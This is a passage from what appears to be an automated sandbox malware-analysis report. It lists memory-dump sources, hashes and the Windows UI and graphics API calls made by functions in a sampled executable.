                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: IconicLongMessagePostWindow
                                                              • String ID:
                                                              • API String ID: 1855654840-0
                                                              • Opcode ID: 5b75d335482d6474d49fbe4119dd366cd56171bccfe432f0c73faf0e2b05141d
                                                              • Instruction ID: 237b86a2d0c8e26630ac87d9a5a3cf288357d6cac33d5337dcd625772df635b3
                                                              • Opcode Fuzzy Hash: 5b75d335482d6474d49fbe4119dd366cd56171bccfe432f0c73faf0e2b05141d
                                                              • Instruction Fuzzy Hash: 29110073220BA14FD7349A39ED85B6A7AE2FF57714F180A29E042C61E1DB68FC049E10
                                                              APIs
                                                                • Part of subcall function 004ECBFE: GetWindowLongW.USER32(?,000000F0), ref: 004ECC09
                                                              • GetKeyState.USER32(00000073), ref: 0055F4D4
                                                              • GetKeyState.USER32(00000012), ref: 0055F4DD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: State$LongWindow
                                                              • String ID:
                                                              • API String ID: 3716621309-0
                                                              • Opcode ID: 5d24020ec53d83d3a072b46281ff03e1ab40c8f3e0fa9e838d34ba352d2c1f12
                                                              • Instruction ID: 14312ab4e4ae7d4c7cdb328ef9422cc103ccff2ac79c0f6813fe4256dc221649
                                                              • Opcode Fuzzy Hash: 5d24020ec53d83d3a072b46281ff03e1ab40c8f3e0fa9e838d34ba352d2c1f12
                                                              • Instruction Fuzzy Hash: 91F0FC3230024A76EF213956DC51EBB3E28EF907A5F104037FD08C6255CE35DD15A350
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: IconicVisibleWindow
                                                              • String ID:
                                                              • API String ID: 1797901696-0
                                                              • Opcode ID: 12c2506019c0b5e31c5474ad407611afd78bcd1ec86a680e1da79f03a4b72dd6
                                                              • Instruction ID: 4c6be2d617e4edff235fbe1286687394bfcbcceb304153d71bf9661eedf53582
                                                              • Opcode Fuzzy Hash: 12c2506019c0b5e31c5474ad407611afd78bcd1ec86a680e1da79f03a4b72dd6
                                                              • Instruction Fuzzy Hash: 7FF08933740910779A31262B9C059BFBE5EBBE2B70714032AF529921F0EE708887D594
                                                              APIs
                                                              • CoInitialize.OLE32(00000000), ref: 004DD399
                                                              • CoCreateInstance.OLE32(00621F68,00000000,00000001,005F987C,006432AC,-0000043C,?,?,004EF56F,00000000,?,00525930), ref: 004DD3B7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: CreateInitializeInstance
                                                              • String ID:
                                                              • API String ID: 3519745914-0
                                                              • Opcode ID: a4fa93822a445f22d7ab04c9a318c8fa2bdc5d7d47ab2adc8f40a4754299d893
                                                              • Instruction ID: 49d78e9da17d2f13cbdd274fa8f4bed064801b7a7253a949ace793e5d0e3fb48
                                                              • Opcode Fuzzy Hash: a4fa93822a445f22d7ab04c9a318c8fa2bdc5d7d47ab2adc8f40a4754299d893
                                                              • Instruction Fuzzy Hash: 30F08275740206EBD7209E54DCC8AB677A9EB94309F28043FF645EA340C7BA6897CB52
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: ForegroundIconicWindow
                                                              • String ID:
                                                              • API String ID: 1248896474-0
                                                              • Opcode ID: 3436be90ad2ad71635a8fd640e36076634521604979dd6331d07a40dfd778d9f
                                                              • Instruction ID: dd6124c5ea7a4b5ffe5c97624527cebced425f211f9742fb254c4b4f22bb4577
                                                              • Opcode Fuzzy Hash: 3436be90ad2ad71635a8fd640e36076634521604979dd6331d07a40dfd778d9f
                                                              • Instruction Fuzzy Hash: 94E02B32204650ABE72027669C09E3B7EB5FFD4732B15022BF616CB2F2DE188C11C759
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Iconic
                                                              • String ID:
                                                              • API String ID: 110040809-0
                                                              • Opcode ID: 3209123467e687d42974359223c5d167e4384993d6d9eac8bff335477acbab5c
                                                              • Instruction ID: de484ebb2d58264f65574acd7783c0210d8ebef66e3bc6480267033c9b0618fa
                                                              • Opcode Fuzzy Hash: 3209123467e687d42974359223c5d167e4384993d6d9eac8bff335477acbab5c
                                                              • Instruction Fuzzy Hash: 3DE0DF32398501AAA6242679BC49D3B2AD9EBC8B16B14022BF606C3591DE18A8028269
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                              • Instruction ID: 1b6070336216e4b4e3529fc280185b332f2666130153be2390e8b0a9d348cc43
                                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                              • Instruction Fuzzy Hash: 96115BB72011418FD6148ABDC8B6FB7AFA6FBC6320B2C437EC0418B754D232D961D500
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 0054733F
                                                              • GetModuleFileNameW.KERNEL32(00000000,005162A3,00000104,?,00000A90,005478F3,?,00000000,00000084,00547D9A,0000000A,0000000A,0000000A,00000000,00000014,0059FFC9), ref: 005473EE
                                                              • __wsplitpath_s.LIBCMT ref: 0054741A
                                                              • __wsplitpath_s.LIBCMT ref: 00547439
                                                              • __wmakepath_s.LIBCMT ref: 00547466
                                                              • _wcslen.LIBCMT ref: 00547472
                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,00000A90,005478F3,?,00000000,00000084,00547D9A,0000000A,0000000A), ref: 005474AA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: File__wsplitpath_s$CreateH_prolog3_ModuleName__wmakepath_s_wcslen
                                                              • String ID:
                                                              • API String ID: 1221639053-3916222277
                                                              • Opcode ID: dd73eb3a0e544a9ef2014781bb0a8b1827449d6aa8717faf5130ecdebcb8ae13
                                                              • Instruction ID: df46e2556c293d9815c888a2a0d5a8810418b86baeccf42f047e010eda66e97a
                                                              • Opcode Fuzzy Hash: dd73eb3a0e544a9ef2014781bb0a8b1827449d6aa8717faf5130ecdebcb8ae13
                                                              • Instruction Fuzzy Hash: ABD12971A00329AFDF209F60CC85AEDBB79FB1A318F1005EAF50AA2551DB745E84DF52
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 0050A68C
                                                              • PtInRect.USER32(?,?,?), ref: 0050A6A2
                                                              • GetClientRect.USER32(?,?), ref: 0050A6BF
                                                              • PtInRect.USER32(?,?,?), ref: 0050A6DA
                                                              • GetSystemMetrics.USER32(0000000D), ref: 0050A706
                                                              • GetSystemMetrics.USER32(0000000E), ref: 0050A711
                                                              • PtInRect.USER32(?,?,?), ref: 0050A755
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$MetricsSystem$ClientWindow
                                                              • String ID:
                                                              • API String ID: 2286436557-0
                                                              • Opcode ID: a0b93f75a2d5dd5abc0ca8701fa2809793c8beaa0d4414ed6f2850c3e4fac84f
                                                              • Instruction ID: 168ef580c13815e93bd3c7aba1d73918afcf3088b0781477756692662c273624
                                                              • Opcode Fuzzy Hash: a0b93f75a2d5dd5abc0ca8701fa2809793c8beaa0d4414ed6f2850c3e4fac84f
                                                              • Instruction Fuzzy Hash: 0DF1C471A0020EAFDF04DFA4CD84EEEBBB9BF48344F10452AE515E7290DA35EA45DB61
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 004FACAE
                                                              • GetParent.USER32(?), ref: 004FAD09
                                                              • GetParent.USER32(?), ref: 004FAD25
                                                              • UpdateWindow.USER32(?), ref: 004FAD6D
                                                              • SetCursor.USER32(?,00000000), ref: 004FAD92
                                                              • GetAsyncKeyState.USER32(00000012), ref: 004FADF4
                                                              • UpdateWindow.USER32(?), ref: 004FAEFA
                                                              • InflateRect.USER32(?,00000002,00000002), ref: 004FAF5A
                                                              • SetCapture.USER32(?), ref: 004FAF63
                                                              • SetCursor.USER32(00000000), ref: 004FAF7B
                                                              • IsWindow.USER32(?), ref: 004FB019
                                                              • GetCursorPos.USER32(?), ref: 004FB058
                                                              • ScreenToClient.USER32(?,?), ref: 004FB065
                                                              • PtInRect.USER32(?,?,?), ref: 004FB081
                                                              • RedrawWindow.USER32(?,00000000,00000000,00000505,?,?,?,?,?,?,?,00000000), ref: 004FB0F5
                                                              • GetParent.USER32(?), ref: 004FB110
                                                              • GetParent.USER32(?), ref: 004FB124
                                                              • RedrawWindow.USER32(?,00000000,00000000,00000505,00000000,?,?,?,?,?,?,?,00000000), ref: 004FB136
                                                              • RedrawWindow.USER32(?,00000000,00000000,00000505,?,?,?,?,?,?,?,00000000), ref: 004FB158
                                                              • GetParent.USER32(?), ref: 004FB161
                                                              • GetParent.USER32(?), ref: 004FB17C
                                                              • GetParent.USER32(?), ref: 004FB187
                                                              • InvalidateRect.USER32(?,?,00000001,?,?,?,?,?,?,?,00000000), ref: 004FB1BF
                                                              • RedrawWindow.USER32(?,00000000,00000000,00000505,00000000,?,00000000,?,?,?,?,?,?,00000000), ref: 004FB2F7
                                                                • Part of subcall function 004F83AB: InvalidateRect.USER32(?,?,00000001,?), ref: 004F8420
                                                                • Part of subcall function 004F83AB: InflateRect.USER32(?,?,?), ref: 004F8466
                                                                • Part of subcall function 004F83AB: RedrawWindow.USER32(?,?,00000000,00000401,?,?), ref: 004F8479
                                                              • UpdateWindow.USER32(?), ref: 004FB257
                                                              • UpdateWindow.USER32(?), ref: 004FB2B6
                                                              • SetCapture.USER32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 004FB2C1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$Parent$RectRedraw$Update$Cursor$CaptureInflateInvalidate$AsyncClientH_prolog3_ScreenState
                                                              • String ID: 83`
                                                              • API String ID: 991125134-1826646354
                                                              • Opcode ID: ce7baf5374865429956633a0297478f058f8be078b328f229ae1a64d4351e612
                                                              • Instruction ID: e4ac4e314660a2e37541cda54767af928ebce6ae2d432c2f88c3df61209fe16b
                                                              • Opcode Fuzzy Hash: ce7baf5374865429956633a0297478f058f8be078b328f229ae1a64d4351e612
                                                              • Instruction Fuzzy Hash: 590291746002189FCF119F65CC98ABE7BB5FF09754F14027AF90A9A2A6DF398804CF95
                                                              APIs
                                                                • Part of subcall function 004ECC18: GetWindowLongW.USER32(?,000000EC), ref: 004ECC23
                                                              • GetClientRect.USER32(?,00000000), ref: 0051F166
                                                              • CopyRect.USER32(?,?), ref: 0051F198
                                                                • Part of subcall function 004E011B: ScreenToClient.USER32(?,?), ref: 004E012C
                                                                • Part of subcall function 004E011B: ScreenToClient.USER32(?,?), ref: 004E0139
                                                              • IntersectRect.USER32(?,?,?), ref: 0051F1E7
                                                              • SetRectEmpty.USER32(?), ref: 0051F1F5
                                                              • IntersectRect.USER32(?,?,?), ref: 0051F227
                                                              • SetRectEmpty.USER32(?), ref: 0051F235
                                                              • IsRectEmpty.USER32(?), ref: 0051F245
                                                              • IsRectEmpty.USER32(?), ref: 0051F24F
                                                              • GetWindowRect.USER32(?,?), ref: 0051F27A
                                                              • GetWindowRect.USER32(?,?), ref: 0051F29D
                                                              • UnionRect.USER32(?,?,?), ref: 0051F2BA
                                                              • EqualRect.USER32(?,?), ref: 0051F2C8
                                                              • GetWindowRect.USER32(?,?), ref: 0051F353
                                                              • IsRectEmpty.USER32(?), ref: 0051F3BD
                                                              • MapWindowPoints.USER32(?,?,?,00000002), ref: 0051F3DA
                                                              • RedrawWindow.USER32(?,?,00000000,00000185), ref: 0051F3EE
                                                              • IsRectEmpty.USER32(?), ref: 0051F408
                                                              • EqualRect.USER32(?,?), ref: 0051F416
                                                              • MapWindowPoints.USER32(?,?,?,00000002), ref: 0051F433
                                                              • RedrawWindow.USER32(?,?,00000000,00000185), ref: 0051F447
                                                              • UpdateWindow.USER32(?), ref: 0051F45C
                                                              • IsRectEmpty.USER32(?), ref: 0051F4A0
                                                              • InvalidateRect.USER32(?,?,00000001), ref: 0051F4B5
                                                              • IsRectEmpty.USER32(?), ref: 0051F4BB
                                                              • EqualRect.USER32(?,?), ref: 0051F4CD
                                                              • InvalidateRect.USER32(?,?,00000001), ref: 0051F4E0
                                                              • UpdateWindow.USER32(?), ref: 0051F4E5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$Window$Empty$ClientEqual$IntersectInvalidatePointsRedrawScreenUpdate$CopyLongUnion
                                                              • String ID:
                                                              • API String ID: 4119827998-0
                                                              • Opcode ID: eea96d1c40095b4b3cca85a9901d9de40de22789253f66f8b085b9d6fdeca42e
                                                              • Instruction ID: a5e82b56544edb15522875cf200fb4e7000de8fd4cbc5b81efb521d148b7b38d
                                                              • Opcode Fuzzy Hash: eea96d1c40095b4b3cca85a9901d9de40de22789253f66f8b085b9d6fdeca42e
                                                              • Instruction Fuzzy Hash: 63D1E77290021DAFDF11DFA4C984AEEBBB9FF08300F20466AE909E7155DB75AA45CF50
                                                              APIs
                                                              • LoadImageW.USER32(?,?,00000000,00000000,00000000,00002000), ref: 00548818
                                                              • GetObjectW.GDI32(?,00000018,?), ref: 00548849
                                                              • DeleteObject.GDI32(?), ref: 00548856
                                                              • CreateCompatibleDC.GDI32(00000000), ref: 0054889A
                                                              • GetObjectW.GDI32(?,00000018,?), ref: 005488B2
                                                              • SelectObject.GDI32(?,?), ref: 005488D8
                                                              • CreateCompatibleBitmap.GDI32(?,?,?), ref: 005488F6
                                                              • SelectObject.GDI32(?,?), ref: 00548909
                                                              • CreateCompatibleDC.GDI32(?), ref: 0054891F
                                                              • SelectObject.GDI32(?,?), ref: 00548934
                                                              • SelectObject.GDI32(?,?), ref: 00548943
                                                              • DeleteObject.GDI32(?), ref: 00548948
                                                              • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00548968
                                                              • GetPixel.GDI32(?,?,?), ref: 00548987
                                                              • SetPixel.GDI32(?,?,?,00000000), ref: 005489BD
                                                              • SelectObject.GDI32(?,?), ref: 005489DF
                                                              • SelectObject.GDI32(?,?), ref: 005489E7
                                                              • DeleteObject.GDI32(?), ref: 005489EC
                                                              • DeleteObject.GDI32(?), ref: 00548A6E
                                                              • __EH_prolog3.LIBCMT ref: 00548736
                                                                • Part of subcall function 004E0E38: DeleteObject.GDI32 ref: 004E0E51
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Object$Select$Delete$CompatibleCreate$Pixel$BitmapH_prolog3ImageLoad
                                                              • String ID: $TR`ujS
                                                              • API String ID: 2657855633-1980147745
                                                              • Opcode ID: 93e6a20bba24e31a4fa51b0d78141823c8084cb3b9ae8cf40e1765750396a559
                                                              • Instruction ID: 024cac6e73b9703d4a22c520de562b331f958b6057509233fe4316de867ae34a
                                                              • Opcode Fuzzy Hash: 93e6a20bba24e31a4fa51b0d78141823c8084cb3b9ae8cf40e1765750396a559
                                                              • Instruction Fuzzy Hash: 43B1347180021AEFCF10AFA1CC859FDBFB5FF18308F50852AF916A2161DB359A99DB51
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 005127B4
                                                              • IsWindow.USER32(?), ref: 00512856
                                                              • GetMenuItemCount.USER32(00000001), ref: 005129B4
                                                              • AppendMenuW.USER32(00000001,00000800,00000000,00000000), ref: 005129CA
                                                              • AppendMenuW.USER32(00000001,00000000,00000000,00000000), ref: 005129E5
                                                              • SendMessageW.USER32(?,0000040C,00000000,00000000), ref: 00512A5B
                                                              • SendMessageW.USER32(?,0000041C,00000000,?), ref: 00512A98
                                                              • GetMenuItemCount.USER32(00000001), ref: 00512AEE
                                                              • AppendMenuW.USER32(00000001,00000800,00000000,00000000), ref: 00512B04
                                                              • AppendMenuW.USER32(00000001,00000000,00000000,?), ref: 00512B25
                                                              • GetMenuItemCount.USER32(00000001), ref: 00512B8C
                                                              • AppendMenuW.USER32(00000001,00000800,00000000,00000000), ref: 00512BA2
                                                              • AppendMenuW.USER32(00000001,00000000,00000000,?), ref: 00512BC3
                                                              • AppendMenuW.USER32(00000002,00000000,00000000,?), ref: 00512CAB
                                                              • GetWindow.USER32(?,00000005), ref: 00512CDC
                                                              • AppendMenuW.USER32(00000003,00000000,00000000,?), ref: 00512D62
                                                              • GetMenuItemCount.USER32(00000000), ref: 00512DA7
                                                              • AppendMenuW.USER32(00000000,00000800,00000000,00000000), ref: 00512DBD
                                                              • AppendMenuW.USER32(00000000,00000000,00000000,?), ref: 00512DD2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Menu$Append$CountItem$MessageSendWindow$H_prolog3_
                                                              • String ID: To`
                                                              • API String ID: 2495817426-992168270
                                                              • Opcode ID: 3b260c33d583677d4fdf89871e66d9c7ee8c0d1cf00cd0b79a90547351bacf6d
                                                              • Instruction ID: 2da2d8eb5d11d0fc98b08f1c454c099a329352a1da7de32268c473be49926adb
                                                              • Opcode Fuzzy Hash: 3b260c33d583677d4fdf89871e66d9c7ee8c0d1cf00cd0b79a90547351bacf6d
                                                              • Instruction Fuzzy Hash: 16023930A042159FEF24AF65CC95BADBBB5BF04304F2040AEE50AA7292CF749994DF55
                                                              APIs
